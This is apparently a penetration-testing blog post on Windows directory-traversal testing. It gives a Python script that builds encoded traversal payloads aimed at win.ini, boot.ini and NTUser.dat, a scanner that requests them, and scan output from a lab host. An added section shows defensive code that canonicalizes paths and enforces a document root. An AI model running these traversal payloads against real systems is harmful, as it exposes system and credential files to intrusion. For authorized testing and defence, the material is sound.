Introduction

Commonly, when testing for directory traversal on a Windows system I spend a significant amount of time manually editing my traversal strings, and it takes a while, so I automated it.

Tools Needed

We will be using the SecLists repository on GitHub by danielmiessler. Specifically, we are going to be using this file:

Here are the modified contents. For the sake of simplicity in this tool, we will be omitting several lines and checking for the existence of only a select few files:

C:/Users/Administrator/NTUser.dat
C:/boot.ini
C:/Windows/win.ini
C:/WINNT/win.ini
win.ini

We also need a list of traversal strings that will be used to test for LFI. Something like this:

../
..\
...//

Writing the Code

Our goal here is to get a list of files to request, where we add the traversal strings to the file names to test. We want a list that looks something like:

../C:/Users/Administrator/NTUser.dat
../../C:/Users/Administrator/NTUser.dat
../../../C:/Users/Administrator/NTUser.dat
../../../../C:/Users/Administrator/NTUser.dat
../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../../C:/Users/Administrator/NTUser.dat

We want a list of these for each filename we want to check. If we ran this over the entire SecLists file list, we would have several thousand URLs to request, which would slow things down.

Creating the List of URLs to Test

We write a script that loops over our tokens and our filenames, writing every combination to a file.

#!/usr/bin/env python3


# create a list of traversal tokens
tokens = [
        "../",
        "....//",
        "....\\",
        "....\\\\",
        "..\\",
        "..././",
        "..\\/",
        "%2e%2e%2f",
        "%252e%252e%252f",
        "%c0%ae%c0%ae%c0%af",
        "%uff0e%uff0e%u2215",
        "%uff0e%uff0e%u2216"
        ]

# create a list of filenames
filenames = [
        "C:/Users/Administrator/NTUser.dat",
        "C:/boot.ini",
        "C:/Windows/win.ini",
        "C:/WINNT/win.ini",
        "win.ini"
        ]


# create traversal strings: the token repeated 1 to 9 times, then the filename
def stringify(token, filename):
    strings = []
    for i in range(1, 10):
        string = token * i + filename
        strings.append(string)
    return strings

# loop through each list, writing every combination to the output file
# (opened once, in write mode, so re-running the script does not append duplicates)
with open('windows-lfi-list.txt', 'w') as f:
    for i in tokens:
        for j in filenames:
            # get list of traversal strings for this token/filename pair
            traversal_strings = stringify(i, j)
            print(traversal_strings)
            # write strings to file
            for s in traversal_strings:
                f.write("%s\n" % s)

Testing for LFI with our new file list

Now that we have our list, we can test whether we can access any of these files on a host.

We write a Python script that accepts a file containing the list of paths to test and a base URL.

#!/usr/bin/env python3
# date 2020-06-22
# author kegn

import sys
import requests


def check_files():
    # first argument: file holding one traversal path per line
    filename = sys.argv[1]
    with open(filename) as f:
        lines = f.read().splitlines()

    # second argument: base URL the paths are appended to
    base_url = sys.argv[2]
    for i in lines:
        url = base_url + i
        response = requests.get(url)

        if response.status_code == 200:
            print("[*] Found at : " + url)
        else:
            # print("[*] Nothing found - testing next string")
            pass


if len(sys.argv) != 3:
    print("  ")
    print("Usage : python lfi-checker filelist-to-check http://10.10.10.10/")
    print("  ")
else:
    check_files()
    print("[*] script complete")

Script output:

[root@kadi lfi-checker]# ./lfi-windows.py windows-lfi-list.txt http://10.10.10.184/
[*] Found at : http://10.10.10.184/../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] script complete
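The encodings the token list relies on (plain `../` and `..\`, percent and double percent encoding, overlong UTF-8 such as `%c0%ae`, and `%uXXXX` escapes) are exactly what a server, a WAF rule or a log-monitoring job has to undo before it can recognise one of the requests in the output above as a traversal attempt. The following is an added example and is not part of the original post or its scripts: it canonicalizes request paths layer by layer, classifies them, and shows the containment check that keeps such requests inside the document root when the check runs after canonicalization. The sample paths are constructed from the URL shapes in the scan output; the `/var/www` root and all function names are assumptions.

```python
#!/usr/bin/env python3
"""Canonicalize request paths, flag directory traversal, and enforce a
document root.  Added example: the sample paths are constructed from the URL
shapes seen in the scan output; the root directory and names are assumptions."""
import posixpath
import re
import unicodedata
from urllib.parse import unquote_to_bytes

# Constructed sample requests: one benign path plus the traversal variants the
# token list produces (plain, backslash, mixed, percent, double percent,
# overlong UTF-8, %u-encoded, and the "....//" form aimed at naive filters).
SAMPLE_PATHS = [
    "/static/app.css",
    "/../../../windows/win.ini",
    "/..\\..\\..\\windows/win.ini",
    "/..\\/..\\/..\\/windows/win.ini",
    "/%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini",
    "/%252e%252e%252fwindows/win.ini",
    "/%c0%ae%c0%ae%c0%afwindows/win.ini",
    "/%uff0e%uff0e%u2215windows/win.ini",
    "/....//....//windows/win.ini",
    "/images/..%2f..%2fboot.ini",
]

# %uXXXX is a non-standard (IIS-style) escape for a single UTF-16 code unit.
PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")
# DIVISION SLASH and SET MINUS are not folded to ASCII by NFKC (fullwidth
# forms such as U+FF0E are), so they are mapped to separators explicitly.
UNICODE_SEPARATORS = str.maketrans({"\u2215": "/", "\u2216": "\\"})


def decode_overlong(raw: bytes) -> bytes:
    """Collapse overlong two-byte UTF-8 sequences (lead byte 0xC0/0xC1) into
    the ASCII byte they encode: C0 AE -> '.', C0 AF -> '/', C1 9C -> '\\'."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def canonicalize(path: str, max_rounds: int = 3) -> str:
    """Undo the encodings one layer per round until the string stops changing
    (bounded, so double encoding is handled without looping forever), then
    fold Unicode look-alikes and backslashes to a single '/' separator."""
    prev, cur = None, path
    for _ in range(max_rounds):
        if cur == prev:
            break
        prev = cur
        cur = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), cur)
        cur = decode_overlong(unquote_to_bytes(cur)).decode("utf-8", errors="replace")
        cur = unicodedata.normalize("NFKC", cur).translate(UNICODE_SEPARATORS)
    return cur.replace("\\", "/")


def classify(request_path: str) -> str:
    """'traversal' if the path climbs above its own root, 'suspicious' if it
    still carries '..' inside a segment (the '....//' trick), otherwise 'ok'."""
    canon = canonicalize(request_path)
    depth = 0
    for segment in canon.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return "traversal"
    return "suspicious" if ".." in canon else "ok"


def safe_join(root: str, request_path: str):
    """Server-side containment check: resolve the canonical path under root
    and refuse anything that lands outside it.  Returns None when rejected."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, canonicalize(request_path).lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def scan(paths):
    """Classify each request path; returns a list of (path, verdict) pairs."""
    return [(p, classify(p)) for p in paths]


if __name__ == "__main__":
    for path, verdict in scan(SAMPLE_PATHS):
        print(f"{verdict:10s} {path!r:55s} -> {safe_join('/var/www', path)}")
```

Two points worth noting when reading the output. The `....//` form is reported as suspicious rather than as a traversal: after canonicalization it resolves to a non-existent path inside the root, and it only escapes when a filter strips `../` once and then trusts the result, which is why the decode-then-check order above matters. Separately, the checker script on this page treats any 200 response as a hit, so an application that answers every path with a custom 200 page will report every string as found; confirming a hit means looking at the body (a real `win.ini` contains INI sections such as `[fonts]` and `[extensions]`).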